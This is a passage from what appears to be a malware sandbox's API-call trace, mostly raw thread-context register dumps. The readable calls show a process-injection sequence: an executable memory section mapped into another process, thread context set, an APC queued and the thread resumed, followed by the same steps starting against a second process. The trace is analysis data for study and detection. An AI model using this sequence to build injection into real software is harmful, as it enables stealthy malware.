[71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x2, SegEs=0x0, SegDs=0x14d1f8, Edi=0x0, Esi=0x1, Ebx=0x0, Edx=0x1, Ecx=0x0, Eax=0x2, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0xff, [13]=0xff, [14]=0xff, [15]=0xff, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x30, [21]=0xd5, [22]=0x14, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0xa4, [45]=0x58, [46]=0xd6, [47]=0x84, [48]=0xf8, [49]=0x7f, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0126.197] NtCreateSection (in: SectionHandle=0xddbf0, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0xddb90, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0xddbf0*=0x1a8) returned 0x0 [0126.201] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0x1a4, BaseAddress=0xddbf8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xddb98*=0x14df56, InheritDisposition=0x7ff800000001, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xddbf8*=0x2df0000, SectionOffset=0x0, ViewSize=0xddb98*=0x14e000) returned 0x0 [0126.209] NtMapViewOfSection (in: SectionHandle=0x1a8, ProcessHandle=0xffffffffffffffff, BaseAddress=0xddbe8*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xddb98*=0x14e000, InheritDisposition=0x7ff800000001, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0xddbe8*=0x75d0000, SectionOffset=0x0, ViewSize=0xddb98*=0x14e000) returned 0x0 [0126.246] NtUnmapViewOfSection (ProcessHandle=0xffffffffffffffff, BaseAddress=0x75d0000) returned 0x0 [0126.438] NtClose (Handle=0x1a8) returned 0x0 [0126.446] NtSetContextThread (ThreadHandle=0x1a0, Context=0xde160*(ContextFlags=0x0, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x10000b, FloatSave.DataSelector=0x1fa0, FloatSave.RegisterArea=([0]=0x33, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x2b, [11]=0x0, [12]=0x46, [13]=0x2, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0xc0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x2, SegEs=0x0, SegDs=0x14d1f8, Edi=0x0, Esi=0x1, Ebx=0x0, Edx=0x1, Ecx=0x0, Eax=0x2, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0xff, [13]=0xff, [14]=0xff, [15]=0xff, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x30, [21]=0xd5, [22]=0x14, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0xb5, [45]=0x8d, [46]=0xeb, [47]=0x2, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x7f, [53]=0x2, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0xa0, [77]=0x1f, [78]=0x0, [79]=0x0, [80]=0xff, [81]=0xff, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0126.447] NtQueueApcThread (ThreadHandle=0x1a0, ApcRoutine=0x2eb8dc2, NormalContext=0x0, SystemArgument1=0x0, SystemArgument2=0x0) returned 0x0 [0126.451] NtResumeThread (in: ThreadHandle=0x1a0, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0126.527] NtClose (Handle=0x1a4) returned 0x0 [0126.527] NtClose (Handle=0x1a0) returned 0x0 [0126.680] NtOpenProcess (in: ProcessHandle=0xdea70, DesiredAccess=0x438, ObjectAttributes=0xdea38*(Length=0x18, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xdea50*(UniqueProcess=0x10e8, UniqueThread=0x0) | out: ProcessHandle=0xdea70*=0x1a0) returned 0x0 [0126.680] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x1a, ProcessInformation=0xdea60, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0xdea60, ReturnLength=0x0) returned 0x0 [0126.680] NtQueryInformationProcess (in: ProcessHandle=0x1a0, ProcessInformationClass=0x0, ProcessInformation=0xde6e4, ProcessInformationLength=0x18, ReturnLength=0x0 | out: ProcessInformation=0xde6e4, ReturnLength=0x0) returned 0x0 [0126.687] NtReadVirtualMemory (in: ProcessHandle=0x1a0, BaseAddress=0x3ba000, Buffer=0xde9f8, NumberOfBytesToRead=0x20, NumberOfBytesRead=0x0 | out: Buffer=0xde9f8*, NumberOfBytesRead=0x0) returned 0x0 [0126.688] NtDelayExecution (Alertable=0, Interval=0xde6cc*=-50000000) returned 0x0 [0131.775] NtOpenThread (in: ThreadHandle=0xdea64, DesiredAccess=0x1a, ObjectAttributes=0xde6b0, ClientId=0xde6c8*(UniqueProcess=0x0, UniqueThread=0x10ec) | out: ThreadHandle=0xdea64*=0x1a4) returned 0x0 [0131.795] NtSuspendThread (in: ThreadHandle=0x1a4, PreviousSuspendCount=0x0 | out: PreviousSuspendCount=0x0) returned 0x0 [0131.795] NtMapViewOfSection (in: SectionHandle=0x184, ProcessHandle=0x1a0, BaseAddress=0xde704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x4 | out: BaseAddress=0xde704*=0x2090000, SectionOffset=0x0, ViewSize=0xde700*=0x9c4000) returned 0x0 [0131.976] NtGetContextThread (in: ThreadHandle=0x1a4, Context=0xde72c | out: Context=0xde72c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x19ff14, Ebx=0x3ba000, Edx=0x0, Ecx=0x0, Eax=0x1, Ebp=0x19febc, Eip=0x7561895c, SegCs=0x23, EFlags=0x202, Esp=0x19fea4, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, 